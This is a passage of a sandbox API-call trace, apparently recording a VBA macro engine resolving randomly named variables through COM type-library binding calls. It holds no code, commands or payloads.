0x0 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDxcZD") returned 7 [0069.319] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wDxcZD", lHashVal=0x10b988, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.319] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDxcZD") returned 0x10b988 [0069.319] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wDxcZD" | out: _Dst="wDxcZD") returned 0x0 [0069.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wDxcZD") returned 7 [0069.319] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.319] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wDxcZD", lHashVal=0x10b988, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.319] IUnknown:Release (This=0x665ba50) returned 0xd [0069.319] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.319] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wDxcZD", lHashVal=0x10b988, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.319] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.320] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.320] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wDxcZD", lHashVal=0x10b988, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.320] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.320] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.320] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wDxcZD", lHashVal=0x10b988, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.320] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b803fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wDxcZD") returned 7 [0069.320] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wDxcZD", lHashVal=0x10b988, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.320] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.320] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b803fe | out: _Dst=0x67c2d40) returned 0x0 [0069.320] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wDxcZD") returned 0x1033f2 [0069.320] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wDxcZD" | out: _Dst="_B_var_wDxcZD") returned 0x0 [0069.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wDxcZD") returned 14 [0069.320] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.320] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wDxcZD", lHashVal=0x1033f2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.320] IUnknown:Release (This=0x665ba50) returned 0xd [0069.320] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.320] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wDxcZD", lHashVal=0x1033f2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.320] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.320] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.320] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wDxcZD", lHashVal=0x1033f2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.320] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.320] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.320] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wDxcZD", lHashVal=0x1033f2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.320] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.320] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.320] IUnknown:Release (This=0x665ba50) returned 0xd [0069.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1235e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wDxcZD") returned 14 [0069.321] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wDxcZD", lHashVal=0x1033f2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x5a006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x5a006300000000, pDummy=0x0) returned 0x0 [0069.321] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b803fe | out: _Dst=0x144ec0) returned 0x0 [0069.321] ITypeComp:RemoteBind (in: This=0x665ba60, szName="woAB4w", lHashVal=0x10312c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="woAB4w") returned 7 [0069.321] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="woAB4w", lHashVal=0x10312c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="woAB4w") returned 7 [0069.321] ITypeComp:RemoteBind (in: This=0x665bd30, szName="woAB4w", lHashVal=0x10312c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.321] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woAB4w") returned 0x10312c [0069.321] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="woAB4w" | out: _Dst="woAB4w") returned 0x0 [0069.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="woAB4w") returned 7 [0069.321] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.321] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="woAB4w", lHashVal=0x10312c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.321] IUnknown:Release (This=0x665ba50) returned 0xd [0069.321] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.321] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="woAB4w", lHashVal=0x10312c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.321] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.321] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.321] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="woAB4w", lHashVal=0x10312c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.321] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.321] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.322] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="woAB4w", lHashVal=0x10312c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.322] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80426, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="woAB4w") returned 7 [0069.322] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="woAB4w", lHashVal=0x10312c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.322] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.322] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80426 | out: _Dst=0x67c2d40) returned 0x0 [0069.322] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_woAB4w") returned 0x10abd5 [0069.322] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_woAB4w" | out: _Dst="_B_var_woAB4w") returned 0x0 [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_woAB4w") returned 14 [0069.322] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.322] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_woAB4w", lHashVal=0x10abd5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.322] IUnknown:Release (This=0x665ba50) returned 0xd [0069.322] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.322] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_woAB4w", lHashVal=0x10abd5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.322] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.322] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.322] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_woAB4w", lHashVal=0x10abd5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.322] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.322] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.322] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_woAB4w", lHashVal=0x10abd5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.322] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.322] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.322] IUnknown:Release (This=0x665ba50) returned 0xd [0069.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1238e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_woAB4w") returned 14 [0069.322] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_woAB4w", lHashVal=0x10abd5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x34004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x34004200000000, pDummy=0x0) returned 0x0 [0069.323] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80426 | out: _Dst=0x144ec0) returned 0x0 [0069.323] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.323] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.323] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.323] IUnknown:Release (This=0x665ba50) returned 0xd [0069.323] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.323] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.323] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.323] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.323] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.323] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.323] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.323] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.323] IUnknown:Release (This=0x665ba50) returned 0xd [0069.323] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.323] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.323] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.323] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.324] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.324] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.324] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.324] IUnknown:Release (This=0x665ba50) returned 0xd [0069.324] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.324] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.324] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.324] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.324] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.324] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.324] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.324] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.324] IUnknown:Release (This=0x665ba50) returned 0xd [0069.324] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.324] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.324] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.324] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.324] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.324] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.324] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.324] IUnknown:Release (This=0x665ba50) returned 0xd [0069.324] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.324] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.325] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.325] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.325] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.325] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.325] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.325] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.325] IUnknown:Release (This=0x665ba50) returned 0xd [0069.325] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.325] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.325] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.325] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.325] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.325] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.325] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.325] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.325] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.325] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.325] IUnknown:Release (This=0x665ba50) returned 0xd [0069.325] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.326] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.326] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.326] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.326] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.326] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.326] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.326] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.326] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.326] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.326] IUnknown:Release (This=0x665ba50) returned 0xd [0069.326] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.326] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.326] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80386, 